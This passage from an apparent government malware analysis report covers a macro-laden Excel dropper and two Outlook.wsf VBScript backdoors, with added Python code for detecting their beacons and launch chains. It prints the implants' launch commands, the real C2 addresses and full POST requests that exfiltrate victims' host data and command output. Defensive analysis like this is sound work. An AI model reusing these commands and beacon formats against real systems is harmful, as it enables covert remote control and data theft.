Displayed below is the POST request used to exfiltrate the victim's system data and the output of the command executed:



--Begin request--

POST /lcekcnkxkbllmwlpoklgof HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 9813

Host: 88[.]119[.]170[.]124



vl=[re-ordered hex-encoded victim's system data and the output of the command executed]

--End request---



Displayed below is sample POST request that contains the encoded victim's system data and the output of the command executed:



--Begin request--

POST /lcekcnkxkbllmwlpoklgof HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 5689

Host: 88[.]119[.]170[.]124



vl=A093273633E2339332927232320A723242D6E6D346365E7226F466E77467273E265674D6469267477C024204601063744215623203A2E202224279426216621227E262052222240296E426262......F0E20702E4A2D2E2DAE2E29240A22252E99265D2F0320602900234705142E5F477A2F2C63066A2027EC2122220524492D8F230420F2397E6CEC225648F56E59600C63706AE0604C4410625E607022202856253E521D013

--End request---



It also sends the messages below to the C2 server using the URI: "http[:]//88[.]119[.]170[.]124/lcekcnkxkbllmwlpoklgof". Each message sent is hex-encoded, and the hex bytes are re-ordered and appended to a string "vl":



--Begin message format--

"200/!*##*!/19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01" ==> When the decoded C2 command data received contains the string "|#@*@#|" or "/!*##*!/".

"19x.1xx.2xx.2xx|#@*@#|WIN-HVMLL1IR74C/user01|#@*@#|sory" ==> When a command or a specific task fails

--End message format--
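The POST beacon described above for Outlook.wsf (f10471e15c...), as an added example that is not code from the report: a parser that splits the raw request and checks the indicators the report gives (the WinHttp.WinHttpRequest.5 User-Agent, the extra "CharSet" header next to the Content-Type charset, a random lowercase URI token, a single "vl" form field of uppercase hex, a Content-Length that matches the body), then identifies the variant by C2 host and URI token. The variant table also carries the second Outlook.wsf (d77e268b74...) described later in this report, which beacons to 5[.]199[.]133[.]149 with the separators "|!)!)!|" and "/!&^^&!/". SAMPLE_REQUEST is the 93-byte request printed above with the defanging brackets removed; the check names and the path-length bounds are this example's own assumptions. Because the report does not describe the hex reshuffle, the payload is validated and sized, not decoded.

```python
"""Parser and indicator check for the Outlook.wsf POST beacon described above.

Added example; not code from the report. SAMPLE_REQUEST is the request
printed above with defanging removed. VARIANTS holds the C2 host, URI
tokens and separators the report gives for both Outlook.wsf beacons.
Check names and the path-length bounds are this example's own assumptions.
"""
import re

UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
VARIANTS = {
    "f10471e15c": {"host": "88.119.170.124",
                   "paths": {"/ezedcjrfvjriftmldedu", "/lcekcnkxkbllmwlpoklgof"},
                   "sep": "|#@*@#|", "ack": "/!*##*!/"},
    "d77e268b74": {"host": "5.199.133.149",
                   "paths": {"/jznkmustntblvmdvgcwbvqb", "/oeajgyxyxclqmfqayv"},
                   "sep": "|!)!)!|", "ack": "/!&^^&!/"},
}

SAMPLE_REQUEST = (
    "POST /ezedcjrfvjriftmldedu HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded; Charset=UTF-8\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-us\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\n"
    "CharSet: UTF-8\r\n"
    "Content-Length: 93\r\n"
    "Host: 88.119.170.124\r\n"
    "\r\n"
    "vl=1693273632E6349334E37235340D743442D53463ED34C7CC2214A90423C5494228E4F7032293856253E6216713"
)


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def score_beacon(raw):
    """Return the indicator checks a request passes, a score, the payload
    size in bytes and the variant (by C2 host and URI token), if any."""
    req = parse_request(raw)
    h = req["headers"]
    m = re.fullmatch(r"vl=([0-9A-F]+)", req["body"])
    hexpart = m.group(1) if m else ""
    checks = {
        "post": req["method"] == "POST",
        "winhttp_ua": h.get("user-agent") == UA,
        # the script adds its own 'CharSet' header on top of the Content-Type charset
        "charset_header": h.get("charset", "").upper() == "UTF-8",
        "random_lowercase_path": re.fullmatch(r"/[a-z]{15,25}", req["path"]) is not None,
        "vl_hex_body": bool(m) and len(hexpart) % 2 == 0,
        "length_consistent": h.get("content-length") == str(len(req["body"])),
    }
    variant = next((name for name, v in VARIANTS.items()
                    if h.get("host") == v["host"] and req["path"] in v["paths"]), None)
    return {"checks": checks, "score": sum(checks.values()),
            "payload_bytes": len(hexpart) // 2, "variant": variant}


def plain_hex_is_text(hexpart):
    """True if a straight hex decode is printable ASCII. For this family it is
    not: the hex digits are reordered before sending, so the 45 bytes in the
    sample are about the length of '<ip>|#@*@#|<host>/<user>' but not its bytes."""
    return all(0x20 <= b < 0x7F for b in bytes.fromhex(hexpart))
```

Run `score_beacon` over reassembled POST requests from proxy or IDS captures. A full score together with a variant hit is the beacon; the User-Agent and the "CharSet" header on their own also appear in legitimate WinHttpRequest scripts and should only raise a low-priority signal. `plain_hex_is_text` is the check to run before spending time on a decoder: it shows that the body is not simply hex and that the reordering step has to be recovered from the script itself.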

Screenshots

Figure 18 - The contents of the VBscript.

88.119.170.124

Tags

command-and-control

HTTP Sessions
  • POST /ezedcjrfvjriftmldedu HTTP/1.1

    Connection: Keep-Alive

    Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

    Accept: */*

    Accept-Language: en-us

    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

    CharSet: UTF-8

    Content-Length: 93

    Host: 88.119.170.124
  • POST /lcekcnkxkbllmwlpoklgof HTTP/1.1

    Connection: Keep-Alive

    Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

    Accept: */*

    Accept-Language: en-us

    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

    CharSet: UTF-8

    Content-Length: 9813

    Host: 88.119.170.124
Whois

Domain Name: bacloud.info

Registry Domain ID: 9ae51aee8f3144059e17d8f8fba3095e-DONUTS

Registrar WHOIS Server: whois.PublicDomainRegistry.com

Registrar URL: http://www.PublicDomainRegistry.com

Updated Date: 2021-03-09T06:39:04Z

Creation Date: 2010-04-22T12:46:58Z

Registry Expiry Date: 2022-04-22T12:46:58Z

Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com

Registrar IANA ID: 303

Registrar Abuse Contact Email: abuse@publicdomainregistry.com

Registrar Abuse Contact Phone: +91.2230797500

Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited

Registry Registrant ID: REDACTED FOR PRIVACY

Registrant Name: REDACTED FOR PRIVACY

Registrant Organization: GDPR Masked

Registrant Street: REDACTED FOR PRIVACY

Registrant City: REDACTED FOR PRIVACY

Registrant State/Province: GDPR Masked

Registrant Postal Code: REDACTED FOR PRIVACY

Registrant Country: US

Registrant Phone: REDACTED FOR PRIVACY

Registrant Phone Ext: REDACTED FOR PRIVACY

Registrant Fax: REDACTED FOR PRIVACY

Registrant Fax Ext: REDACTED FOR PRIVACY

Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

Registry Admin ID: REDACTED FOR PRIVACY

Admin Name: REDACTED FOR PRIVACY

Admin Organization: REDACTED FOR PRIVACY

Admin Street: REDACTED FOR PRIVACY

Admin City: REDACTED FOR PRIVACY

Admin State/Province: REDACTED FOR PRIVACY

Admin Postal Code: REDACTED FOR PRIVACY

Admin Country: REDACTED FOR PRIVACY

Admin Phone: REDACTED FOR PRIVACY

Admin Phone Ext: REDACTED FOR PRIVACY

Admin Fax: REDACTED FOR PRIVACY

Admin Fax Ext: REDACTED FOR PRIVACY

Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

Registry Tech ID: REDACTED FOR PRIVACY

Tech Name: REDACTED FOR PRIVACY

Tech Organization: REDACTED FOR PRIVACY

Tech Street: REDACTED FOR PRIVACY

Tech City: REDACTED FOR PRIVACY

Tech State/Province: REDACTED FOR PRIVACY

Tech Postal Code: REDACTED FOR PRIVACY

Tech Country: REDACTED FOR PRIVACY

Tech Phone: REDACTED FOR PRIVACY

Tech Phone Ext: REDACTED FOR PRIVACY

Tech Fax: REDACTED FOR PRIVACY

Tech Fax Ext: REDACTED FOR PRIVACY

Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.

Name Server: dns1.laisvas.lt

Name Server: ns3.laisvas.lt

Name Server: ns5.laisvas.lt

DNSSEC: unsigned

URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/

>>> Last update of WHOIS database: 2022-02-01T10:54:20Z <<<

Relationships
88.119.170.124 Connected_From f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0
Description

The malware C2 IP address.

4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c

Tags

downloader
dropper
loader
trojan

Details
Name ZaibCb15Ak.xls
Size 254976 bytes
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Nov 1 07:15:30 2021, Last Saved Time/Date: Mon Nov 1 07:17:43 2021, Security: 0
MD5 6cef87a6ffb254bfeb61372d24e1970a
SHA1 e21d95b648944ad2287c6bc01fcc12b05530e455
SHA256 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
SHA512 a99ca0f86da547d2979bd854b29824da77472b16aa2d2dcbc0e5c3eb4b488ae69f9d3006bc326b52b9145076247b64ba55cacfaaf30e417ea8d4f71447d682aa
ssdeep 6144:8k3hOdsylKlgryzc4bNhZF+E+W2knArYi4uU4pVZ8lx+tSea4awSi:PiLZpVZ8lx+tna4TZ
Entropy 7.232043
Antivirus
Antiy Trojan[Downloader]/MSOffice.Agent.gho
Avira W97M/Hancitor.tnvir
Bitdefender Trojan.Generic.31220507
ESET a variant of Generik.GHODWTC trojan
Emsisoft Trojan.Generic.31220507 (B)
IKARUS Trojan.SuspectCRC
Lavasoft Trojan.Generic.31220507
McAfee RDN/Woreflint
NANOAV Trojan.Ole2.Vbs-heuristic.druvzi
NETGATE Trojan.Win32.Malware
Quick Heal Ole.Trojan.A3288643
Sophos Troj/DocDl-AEVH
Symantec Trojan.Mdropper
Trend Micro Trojan.E78080B2
Trend Micro HouseCall Trojan.E78080B2
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
4b2862a166... Contains d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
4b2862a166... Contains ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
Description

This artifact is a malicious Excel file that contains macros written in VBA and two encoded wsf files. When the Excel file is opened, the victim will be prompted to enable macros with the “Enable Content” button. The macros are executed once the victim enables content. When executed, the macros decode and install the embedded wsf files into the directories below:



--Begin files--

"%LocalAppData%\Outlook.wsf"

"%AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf"

--End files--

Screenshots

Figure 19 - The contents of the Excel file.

ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418

Details
Name Outlook.wsf
Size 11980 bytes
Type HTML document, Little-endian UTF-16 Unicode text, with CRLF line terminators
MD5 e1f97c819b1d26748ed91777084c828e
SHA1 4209a007fcf4d4913afad323eb1d1ae466f911a6
SHA256 ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418
SHA512 8a98999bc6ff4094b5e1d795e32345aca4e70b8e91ad1e4ba3f6ec6dabcf5591dc5c9740e6c326b23c6120b847611006d86e56dd2590ce30cf76eb076723f477
ssdeep 192:/LsEDuNb8pWGNm91llKk8YwB4o6N8M6sBISa9FE8mJSZbHCExZ9EEFaeYuan:zsquN4K/aHYa42saSstmJSZbxZLK
Entropy 4.063463
Path %AppData%\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
ed988768f5... Contained_Within 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
Description

This artifact is a wsf file installed by ZaibCb15Ak.xls (4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c). This file is installed into the current user startup folder to run automatically at startup. The file contains hex-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decode these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

"vqFIPLLYRjbxR8Km3m9p1ACzyK4Zps20.run PprJwVD1jVboW9s2WjL9uCH1Jk02tisB,0,TRUE"

"cmd.exe /c cscript.exe %LocalAppData%\\Outlook.wsf humpback__whale"

--End strings--



It executes the command below to run the wsf file "%LocalAppData%\Outlook.wsf" (d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0) with the argument "humpback__whale".



Displayed below is the command:



--Begin command--

"cmd.exe /c cscript.exe %LocalAppData%\\Outlook.wsf humpback__whale"

--End command--
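The launch chain used by both Startup-folder launchers, Outlook.wsf (c2badcdfa9..., argument "jaguar_plus", second stage in %ProgramData%) and this Outlook.wsf (ed988768f5..., argument "humpback__whale", second stage in %LocalAppData%), as an added detection example that is not code from the report. The decoded ".run ...,0,TRUE" string is consistent with WScript.Shell.Run(command, 0, True), a hidden window that waits for exit, so on the host the chain is wscript.exe (Startup Outlook.wsf) -> cmd.exe /c -> cscript.exe <Outlook.wsf> <keyword>. The matcher below walks that tree over process-creation events. The events are constructed in a Sysmon Event ID 1 like shape; their field names, PIDs and image paths are this example's own.

```python
"""Process-tree matcher for the Outlook.wsf launch chain described above.

Added example; not code from the report. Events are constructed in a
Sysmon Event ID 1 like shape (pid, ppid, image, cmdline); PIDs, image
paths and field names are this example's own. Both keywords and both
second-stage directories come from the decoded strings above.
"""
import re

# Directories the droppers write the second-stage Outlook.wsf to, as they
# appear in an expanded command line or with the variable unexpanded.
STAGE2_DIRS = ("\\programdata\\", "%programdata%", "\\appdata\\local\\", "%localappdata%")
STAGE2_RE = re.compile(r"cscript(?:\.exe)?\s+\S*outlook\.wsf\s+(\S+)", re.IGNORECASE)

SAMPLE_EVENTS = [
    # Cooperation terms.xls chain: Startup Outlook.wsf -> cmd -> cscript jaguar_plus
    {"pid": 4012, "ppid": 700, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\user01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Outlook.wsf"'},
    {"pid": 4100, "ppid": 4012, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c cscript.exe C:\ProgramData\Outlook.wsf jaguar_plus"},
    {"pid": 4112, "ppid": 4100, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\ProgramData\Outlook.wsf jaguar_plus"},
    # ZaibCb15Ak.xls second stage whose parent events were not collected.
    {"pid": 6000, "ppid": 5900, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\Users\user01\AppData\Local\Outlook.wsf humpback__whale"},
    # Benign: cscript from a tools directory, no Outlook.wsf, no keyword.
    {"pid": 5000, "ppid": 700, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe C:\Tools\inventory.wsf"},
]


def launch_chains(events):
    """One finding per cscript.exe that ran Outlook.wsf from a stage-2
    directory with a keyword argument. full_chain is True only when the
    parent is cmd.exe and the grandparent is wscript.exe started from a
    Startup folder; a missing parent still yields a (weaker) finding."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if not e["image"].lower().endswith("\\cscript.exe"):
            continue
        m = STAGE2_RE.search(e["cmdline"])
        if not m or not any(d in e["cmdline"].lower() for d in STAGE2_DIRS):
            continue
        parent = by_pid.get(e["ppid"])
        grand = by_pid.get(parent["ppid"]) if parent else None
        full_chain = (parent is not None and parent["image"].lower().endswith("\\cmd.exe")
                      and grand is not None and grand["image"].lower().endswith("\\wscript.exe")
                      and "\\startup\\" in grand["cmdline"].lower())
        findings.append({"pid": e["pid"], "keyword": m.group(1), "full_chain": full_chain})
    return findings
```

The keyword argument is the strongest single token: cscript.exe is rarely handed a bare word after a .wsf path in normal administration. The weaker finding for the orphaned cscript.exe is deliberate, since process-creation telemetry frequently loses the first events after a logon, which is exactly when a Startup-folder launcher fires.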

Screenshots

Figure 20 - The contents of the VBscript.

d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0

Tags

downloader
loader
trojan

Details
Name Outlook.wsf
Size 40674 bytes
Type HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 cb84c6b5816504c993c33360aeec4705
SHA1 9f212961d1de465c20e84f3c4d8ac0302e02ce37
SHA256 d77e268b746cf1547e7ed662598f8515948562e1d188a7f9ddb8e00f4fd94ef0
SHA512 fec12d5871544bf1d3038baa2c209ceb4b8c8c852b60a222d2e0486b15593cecd26e130bdadcf0927e5f556cca42d3a0bb764fcc00b685a0e464531d36a7c156
ssdeep 768:Wqy5Dr1BE9cmvcmPcvmzm/mAm6zYAr8LBFMwEVxLa3knrjrSK0rvdRz0nq8Fj:Vy5zE9V1cnHCkn3+vdRz0nqG
Entropy 4.028422
Path %LocalAppData%\Outlook.wsf
Antivirus
Avira VBS/Dldr.Agent.LE
IKARUS VBS.Trojan-Downloader.Agent
NANOAV Trojan.Script.Vbs-heuristic.druvzi
Quick Heal VBS.Downloader.45256
Sophos Troj/HTA-AB
Symantec VBS.Downloader.Trojan
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Relationships
d77e268b74... Contained_Within 4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c
d77e268b74... Connected_To 5.199.133.149
Description

This artifact is a wsf file installed by ZaibCb15Ak.xls (4b2862a1665a62706f88304406b071a5c9a6b3093daadc073e174ac6d493f26c) and executed by Outlook.wsf (ed988768f50f1bb4cc7fb69f9633d6185714a99ecfd18b7b1b88a42a162b0418). This file and Outlook.wsf (f10471e15c6b971092377c524a0622edf4525acee42f4b61e732f342ea7c0df0) have similar code functions. The file contains hex-encoded strings that have been reshuffled. When executed, the malware uses built-in algorithms to arrange and hex decode these strings.



Displayed below are strings of interest decoded during runtime:



--Begin strings--

{impersonationLevel=impersonate}!\\\\

%AppData%\\Local\\Temp\\stari.txt

stari.txt

jznkmustntblvmdvgcwbvqb

oeajgyxyxclqmfqayv

http[:]//5[.]199[.]133[.]149/

POST

cmd.exe /c

>> %temp%\\stari.txt

Select * from Win32_IP4RouteTable

"%COMPUTERNAME%"

"%USERNAME%"

E442779124B3E37D2A3F77D77B66A.Open jQ8EVB2A05RmlH0YGkge7CpSBNWN1n2d,KVj42Vxufd0LRBFfZDVj3wRxJ5CX9vOX,False

E442779124B3E37D2A3F77D77B66A.send jQ8EVB2A05RmlH0YGkge7CpSBNWN1n2d

--End strings--



It collects the victim's system IP address, computer name, and username in the format below:



--Begin information--

Format: [victim's system Internet Protocol address]|!)!)!|[Computer name]/Username

Sample: "19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01"

--End information--



The collected data above is hex-encoded, and the hex bytes are reshuffled and appended to a string "vl" before exfiltration. It will send the encoded data using the URI: "http[:]//5[.]199[.]133[.]149/jznkmustntblvmdvgcwbvqb" and wait for a response.



Displayed below is the POST request used to exfiltrate the victim's system data:



--Begin request--

POST /jznkmustntblvmdvgcwbvqb HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 93

Host: 5[.]199[.]133[.]149



vl=6793263635E4329334937215349F743442D53463ED3....7CC2212199221C5494228E4F70322D38562E3E6212713

--End request---



The response payload was not available for analysis. Analysis indicates that the C2 response payloads are hex-encoded and reshuffled. It uses the same built-in algorithm to arrange and hex decode these payloads, which contain command-line scripts. The malware will search for the string "|!)!)!|" or "/!&^^&!/" in the decoded payload. If the payload contains one of these strings, it will parse the command-line scripts for execution using the command below:



--Begin command--

"cmd.exe /c [decoded command scripts]| >> %temp%\\stari.txt"

--End command--



The output of the command-line scripts executed is stored into a text file "%temp%\stari.txt". It reads the output of the command executed from the text file "%temp%\stari.txt" and attaches it to the victim's system IP address, computer name, and username in the format below:



--Begin format--

Format: "[victim's system Internet Protocol address]|!)!)!|[Computer name]/Username|!)!)!|[Output of the command executed]"



Sample: "19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01|!)!)!|\r\nWindows IP Configuration\r\n\r\n\r\nEthernet adapter Local Area Connection 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Link-local IPv6 Address . . . . . : fe80::d1d7:d838:2959:23d0%15\r\n IPv4 Address. . . . . . . . . . . : 19x.1xx.2xx.1xx\r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Default Gateway . . . . . . . . . : 19x.1xx.2xx.2xx\r\n\r\nEthernet adapter Local Area Connection:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter isatap.{62D6C817-FD7E-4634-83CF-3311F44F4490}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n\r\nTunnel adapter Teredo Tunneling Pseudo-Interface:\r\n\r\n Connection-specific DNS Suffix . : \r\n IPv6 Address. . . . . . . . . . . : 2001:0:c000:27b:c2f:3a2f:3f57:2e63\r\n Link-local IPv6 Address . . . . . : fe80::c2f:3a2f:3f57:2e63%12\r\n Default Gateway . . . . . . . . . : ::\r\n\r\nTunnel adapter isatap.{43E8EDE4-433A-453E-B583-1A994D8B33E2}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n"

--End format--



The above victim's system information and the output of the command executed are hex-encoded, the hex bytes are re-ordered, and the result is sent as the value of the POST parameter "vl". The malware sends the encoded data to the URI "http[:]//5[.]199[.]133[.]149/oeajgyxyxclqmfqayv" and waits for a response (the next command).



Displayed below is the POST request used to exfiltrate the victim's system data and the output of the command executed:



--Begin request--

POST /oeajgyxyxclqmfqayv HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 93

Host: 5[.]199[.]133[.]149



vl=[re-ordered hex-encoded victim's system data and the output of the command executed]

--End request--



Displayed below is a sample POST request that contains the encoded victim's system data and the output of the command executed:



--Begin request--

POST /oeajgyxyxclqmfqayv HTTP/1.1

Connection: Keep-Alive

Content-Type: application/x-www-form-urlencoded; Charset=UTF-8

Accept: */*

Accept-Language: en-us

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

CharSet: UTF-8

Content-Length: 5689

Host: 5[.]199[.]133[.]149



vl=A093273633E2339332927212329A723242D6E6D346365E7226F246E76227271E265674D6469267477C024204601063744215623203A2E202222279426216621227E272052222220296E226262EE60400253446D462D44260577314D223435023231473A36633635F6363270303E6237320E36206220200A20200622222420254226220E277022607260664E0262622E60702762560422202200322222740672742E644C265242C0425E2221722E62705272603A4020542422802228422026422424022322402D2E3223225E20200660602A7268D767776040216727020C2231422D2671726F066777692050634720DA626026606623722F0262662360692262650022262600023E62700060622460632664660F666E6260425E372002262220202E22222209222522232220222F5322222D647E2772571B626F266C472922203302022033782744368C46347730376E4030023232204D2E4235323A254063323379364643463325313062267410766E6660262E627042626220236E2262620E52002206002A62603762763F422947262799202026202625252E0224225E207056776000277C7670664F564C0446736040246622020E32302230222022260322232420272622230A2225232026206475F5706605247502746090664967232464062557626260706E6267720E2630722D32406631A33633683E3042376308366526693664363D6266256523256226273B222032242200706E3260622E263022544335666263606365676DD24624652F0577272644667162656260765EE234324E3330223563093661636A33796235403262203433273034513230223E3240362E3226227E292072272300262563292323222052222420207026627604624524307220422E0222022E706022223200222032202241262202666265606052226202657152707224636A02636433707547252740040E6244227E262002262220292E6326235226266220236E26260022622E6D62046046D65240264D276E270052364260333E6232328536326634306D3734963236243134273227302223262527252223D6222624232E20227040637D266142336264326472206D5E3222225E036022656240627D564422046473267256E4646D4261645F62751726666D69756656262022232524262922201222202A2120262227C92229262E222E6260527262206A7E224322AE2400662436082220C572634061707526569446226260666E666406772060606067666601626146202763060E0206326E606022726200624022606222627402226251606A72606443522526626644665E6276622E7060626622F0666E2372565307005272674F203E66272701272F722D26226264A262622E2A60226277ED727A37
6E666C6664E77377302E21660307.........EC2C602658246E29E3302A60EE602E600E422E50E5206E6E7E607E209E0E0E202E703E6E052D2E6EE07E232F0E20702E4A2D2E2DAE2E29240A22252E99265D2F0320602900234705142E5F477A2F2C6106612927EC2622250E244D2F8F230420F2397E6CEC225648F56E59609C61706199604C4410625E607022202856253E521D013

--End request--



The malware also sends the messages below to the C2 server using the URI "http[:]//5[.]199[.]133[.]149/oeajgyxyxclqmfqayv". Each message is hex-encoded, the hex bytes are re-ordered, and the result is sent as the value of the POST parameter "vl":



--Begin message format--

"200/!&^^&!/19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01" ==> Sent when the decoded C2 command data received contains the string "|!)!)!|" or "/!&^^&!/".

"19x.1xx.2xx.2xx|!)!)!|WIN-HVMLL1IR74C/user01|!)!)!|sory" ==> Sent when a command or a specific task fails.

--End message format--
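The beacon and message framing described above, as an added triage example in Python (not part of the MAR and not the actor's code): the first function flags a raw HTTP request that matches the POST shape shown above, and the second classifies an already decoded beacon body into the three message types (command output, acknowledgement, failure). The C2 host, the two observed URIs, the user-agent and the two delimiter strings are taken from the report; the two sample requests are constructed for the example, and the hex re-ordering step, which the report describes elsewhere, is not reproduced here.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Values taken from the report: C2 host, the two observed URIs, the
# WinHttpRequest user-agent and the two framing strings.
C2_HOST = "5.199.133.149"
C2_URIS = {"/oeajgyxyxclqmfqayv", "/jznkmustntblvmdvgcwbvqb"}
BEACON_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
SEP_PIPE = "|!)!)!|"
SEP_SLASH = "/!&^^&!/"
FAIL_MARK = "sory"


def parse_http_request(raw: str) -> Tuple[str, str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (method, uri, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, uri, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, uri, headers, body


def beacon_indicators(raw: str) -> List[str]:
    """Return the beacon traits matched by one request, strongest first.

    Host and URI are infrastructure indicators that change when the actor
    rotates servers; the WinHttpRequest.5 user-agent together with a body
    that is exactly 'vl=' followed by hex digits is the behavioural shape
    of the beacon and is worth alerting on by itself.
    """
    method, uri, headers, body = parse_http_request(raw)
    hits: List[str] = []
    if method != "POST":
        return hits
    # Accept defanged captures ("5[.]199[.]133[.]149") as well as live ones.
    if headers.get("host", "").replace("[.]", ".") == C2_HOST:
        hits.append("known C2 host")
    if uri in C2_URIS:
        hits.append("known C2 URI")
    if headers.get("user-agent") == BEACON_UA:
        hits.append("WinHttpRequest.5 user-agent")
    if re.fullmatch(r"vl=[0-9A-Fa-f]+", body.strip()):
        hits.append("vl= hex-only body")
    return hits


@dataclass
class BeaconMessage:
    kind: str            # "ack", "failure" or "output"
    ip: str
    computer: str
    user: str
    output: str = ""


def classify_message(decoded: str) -> Optional[BeaconMessage]:
    """Classify a decoded beacon body using the framing strings the report documents.

    Decoding itself (hex decode plus the byte re-ordering the report describes
    elsewhere) is not reproduced here; pass the already decoded text.
    """
    ack_prefix = "200" + SEP_SLASH
    if decoded.startswith(ack_prefix):
        ip, _, computer_user = decoded[len(ack_prefix):].partition(SEP_PIPE)
        computer, _, user = computer_user.partition("/")
        return BeaconMessage("ack", ip, computer, user)
    # "[ip]|!)!)!|[computer]/[user]|!)!)!|[payload]"; split at most twice so
    # that a delimiter inside command output stays part of the payload.
    parts = decoded.split(SEP_PIPE, 2)
    if len(parts) != 3:
        return None
    ip, computer_user, payload = parts
    computer, _, user = computer_user.partition("/")
    if payload == FAIL_MARK:
        return BeaconMessage("failure", ip, computer, user)
    return BeaconMessage("output", ip, computer, user, payload)


# Constructed samples: a beacon shaped like the report's capture (body truncated)
# and an unrelated form post that must not match.
SAMPLE_BEACON = (
    "POST /oeajgyxyxclqmfqayv HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded; Charset=UTF-8\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-us\r\n"
    f"User-Agent: {BEACON_UA}\r\n"
    "CharSet: UTF-8\r\n"
    "Content-Length: 93\r\n"
    "Host: 5[.]199[.]133[.]149\r\n"
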